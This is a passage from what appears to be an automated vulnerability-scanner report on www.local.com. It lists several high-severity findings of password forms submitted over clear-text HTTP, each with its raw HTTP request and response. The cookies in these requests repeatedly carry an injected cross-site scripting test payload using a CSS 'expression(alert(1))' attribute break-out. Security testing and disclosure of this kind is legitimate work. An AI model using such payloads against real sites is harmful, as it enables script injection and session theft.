Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.23. http://www.local.com/privacy/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.24. http://www.local.com/results.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 74200
Date: Thu, 03 Feb 2011 15:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=wu21mu55lor2xjbsdwrsmh45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=1c5b338d-bcdd-44ba-b370-36f6691769b8&expdate=634349085027409460&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:02 GMT; path=/
Content-Length: 74200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.25. http://www.local.com/results/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.26. http://www.local.com/sitemap.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.27. http://www.local.com/sitemap/chicago-il.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.28. http://www.local.com/sitemap/los-angeles-ca.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.29. http://www.local.com/sitemap/new-york-ny.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.30. http://www.local.com/terms/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.31. http://www.local.com/topics/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
